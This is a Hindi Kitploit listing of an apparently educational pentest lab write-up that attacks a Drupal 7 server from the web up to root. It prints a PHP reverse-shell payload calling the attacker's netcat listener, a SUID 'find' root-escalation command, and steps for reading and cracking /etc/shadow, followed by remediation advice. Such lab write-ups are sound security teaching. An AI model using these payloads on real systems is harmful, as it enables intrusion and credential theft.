Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Audit-BlackBox-Web-to-Root — Drupal 7 सर्वर का ब्लैक बॉक्स सुरक्षा ऑडिट। पूर्ण किल चेन का प्रदर्शन: SQL इंजेक्शन (CVE-2014-3704) ➔ RCE ➔ रिवर्स शेल ➔ रूट (SUID) तक एस्केलेशन। इस रिपॉजिटरी में विस्तृत तकनीकी रिपोर्ट, शोषण के प्रमाण (PoC) और बुनियादी ढांचे को सुरक्षित करने के उपाय शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/fbm31/audit-blackbox-web-to-root
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
लर्निंग और शिक्षा
लैब और अभ्यास
GitHubfbm31/audit-blackbox-web-to-root

Audit-BlackBox-Web-to-Root

Drupal 7 सर्वर का ब्लैक बॉक्स सुरक्षा ऑडिट। पूर्ण किल चेन का प्रदर्शन: SQL इंजेक्शन (CVE-2014-3704) ➔ RCE ➔ रिवर्स शेल ➔ रूट (SUID) तक एस्केलेशन। इस रिपॉजिटरी में विस्तृत तकनीकी रिपोर्ट, शोषण के प्रमाण (PoC) और बुनियादी ढांचे को सुरक्षित करने के उपाय शामिल हैं।

रिपॉजिटरी देखें
38 महीने पहलेअभी तक समीक्षित नहीं

Pentest Lab : वेब और सिस्टम एक्सप्लॉइटेशन चेन (Drupal to Root)

अस्वीकरण

यह परियोजना शैक्षिक और अकादमिक उद्देश्यों के लिए एक नियंत्रित और पृथक प्रयोगशाला वातावरण में की गई थी। किसी भी वास्तविक बुनियादी ढांचे को लक्षित नहीं किया गया। उद्देश्य हमले के तंत्र को समझकर सिस्टम को सुरक्षित करना सीखना है।


कार्य वातावरण और उद्देश्य

परिदृश्य

इस परियोजना का उद्देश्य एक ब्लैक बॉक्स ऑडिट (Black Box) करना है। इसका मतलब है कि विश्लेषण लक्ष्य के बारे में किसी भी पूर्व जानकारी के बिना शुरू होता है: कोई क्रेडेंशियल, कोई तकनीकी दस्तावेज, और न ही कोई स्रोत कोड प्रदान किया गया।

लैब की वास्तुकला

बुनियादी ढांचे को VMware के तहत एक पृथक निजी नेटवर्क (Host-Only) में वर्चुअली तैनात किया गया था ताकि बाहरी दुनिया के साथ किसी भी बातचीत से बचा जा सके।

  • हमलावर मशीन (Kali Linux): 192.168.78.131
    • उपकरण: Nmap, Python, Netcat, John the Ripper.
  • लक्ष्य मशीन (पीड़ित): 192.168.78.132
    • OS: Linux (Debian).
    • प्रारंभिक स्थिति: अज्ञात।

चरण 1: पहचान और खोज

पहला कदम पोर्ट स्कैन का उपयोग करके लक्ष्य मशीन के हमले की सतह का मानचित्रण करना था।

निष्पादित कमांड: nmap -sV 192.168.78.132

Nmap Scan

पहचानी गई सेवाएं:

  • पोर्ट 22 (TCP): SSH (OpenSSH 6.0p1).
  • पोर्ट 80 (TCP): HTTP सर्वर (Apache 2.2.22).
  • पोर्ट 111 (TCP): rpcbind.

वेब सेवा (पोर्ट 80) और robots.txt फ़ाइल के विश्लेषण ने एक CMS Drupal की उपस्थिति का खुलासा किया। स्रोत कोड के निरीक्षण ने एक पुराने संस्करण की पहचान करने में मदद की: Drupal 7.x।


कमजोरियों का विश्लेषण

पहचान चरण के परिणामों ने एक महत्वपूर्ण हमले की सतह को उजागर किया: एक अनुरक्षित Drupal 7 CMS। यह संस्करण ऐतिहासिक रूप से प्रमुख सुरक्षा कमजोरियों (विशेष रूप से "Drupalgeddon") के लिए संवेदनशील होने के लिए जाना जाता है।

इस निष्कर्ष के मद्देनजर, ऑडिट सार्वजनिक कमजोरियों (CVE) की लक्षित खोज की ओर उन्मुख हुआ। इस गणना ने एक पूर्ण एक्सप्लॉइटेशन चेन के अस्तित्व की पुष्टि की, जो एक साधारण वेब आगंतुक से "रूट" सिस्टम प्रशासक बनने की अनुमति देती है।

पहचाने गए हमले के वेक्टर:

  1. वेब: SQL इंजेक्शन (CVE-2014-3704).
  2. एप्लिकेटिव: "PHP Filter" मॉड्यूल का गलत कॉन्फ़िगरेशन।
  3. सिस्टम: सिस्टम बाइनरी पर खतरनाक SUID अनुमतियां।

शोषण (किल चेन)

चरण 1: प्रारंभिक घुसपैठ (SQL इंजेक्शन)

CVE-2014-3704 (Drupalgeddon) कमजोरी का शोषण। Drupal के डेटाबेस API में यह भेद्यता प्रमाणीकरण के बिना SQL कमांड इंजेक्ट करने की अनुमति देती है।

  • कार्रवाई: users तालिका में प्रशासक अधिकारों के साथ एक नया उपयोगकर्ता इंजेक्ट करना।
  • परिणाम: CMS के प्रशासन पैनल तक पहुंच।

Exploit SQLi

Python स्क्रिप्ट प्राप्त करें

चरण 2: कोड निष्पादन (RCE और रिवर्स शेल)

एक बार व्यवस्थापक के रूप में लॉग इन करने के बाद, मूल PHP Filter मॉड्यूल का उपयोग। यह मॉड्यूल, गलत तरीके से कॉन्फ़िगर किया गया, साइट के पृष्ठों में मनमाना PHP कोड निष्पादित करने की अनुमति देता है।

  • पेलोड: <?php system('nc -e /bin/bash 192.168.78.131 4444'); ?>
  • परिणाम: Kali मशीन पर एक दूरस्थ शेल प्राप्त करना (उपयोगकर्ता www-data)।

Reverse Shell

चरण 3: विशेषाधिकार उन्नयन (रूट की ओर)

SUID (Set User ID) अनुमति वाली फ़ाइलों का विश्लेषण। find कमांड पर एक महत्वपूर्ण कॉन्फ़िगरेशन की खोज।

  • उन्नयन कमांड: find . -exec '/bin/sh' \;
  • परिणाम: find बाइनरी रूट के रूप में निष्पादित होती है, रूट (uid=0) विशेषाधिकारों के साथ एक शेल लॉन्च करती है।

चरण 4: पोस्ट-एक्सप्लॉइटेशन

एक बार रूट एक्सेस प्राप्त करने के बाद, उपयोगकर्ता पासवर्ड के हैश निकालने के लिए संवेदनशील फ़ाइल /etc/shadow पढ़ना।

  • कार्रवाई: डिक्शनरी अटैक द्वारा SHA-512 हैश को क्रैक करने के लिए John the Ripper का उपयोग।
  • परिणाम: रूट/उपयोगकर्ता पासवर्ड प्राप्त करना (कम जटिलता), सिस्टम पर स्थायित्व की अनुमति देना।

Reverse Shell

संश्लेषण

ऑडिट ने गंभीर जोखिम स्तर का खुलासा किया। एक पुराने CMS और सिस्टम कॉन्फ़िगरेशन (SUID) में लापरवाही का संयोजन सर्वर से पूर्ण समझौता करने की अनुमति देता है।

कंपनी पर प्रभाव:

  • गोपनीयता: ग्राहक डेटाबेस और सिस्टम फ़ाइलों (/etc/shadow) का संभावित बहिर्वाह।
  • अखंडता: साइट डेटा का पूर्ण संशोधन या विलोपन।
  • उपलब्धता: तोड़फोड़ या सेवा में रुकावट का जोखिम।

प्राथमिक कार्य योजना:

  1. अपडेट: SQLi कमजोरी को ठीक करने के लिए Drupal को नवीनतम स्थिर संस्करण में माइग्रेट करें।
  2. सिस्टम सख्तीकरण: गैर-आवश्यक निष्पादन योग्य से SUID बिट हटाएं (chmod u-s /usr/bin/find)।
  3. न्यूनतम विशेषाधिकार: यदि सख्ती से आवश्यक न हो तो PHP Filter मॉड्यूल को अक्षम करें।

दस्तावेज़ीकरण

पूर्ण तकनीकी विवरण, उपयोग की गई स्क्रिप्ट और गहन विश्लेषण के लिए, पूर्ण रिपोर्ट देखें: ऑडिट रिपोर्ट पढ़ें (PDF)

लेखक

Fabien MOINE

टूल डाउनलोड करें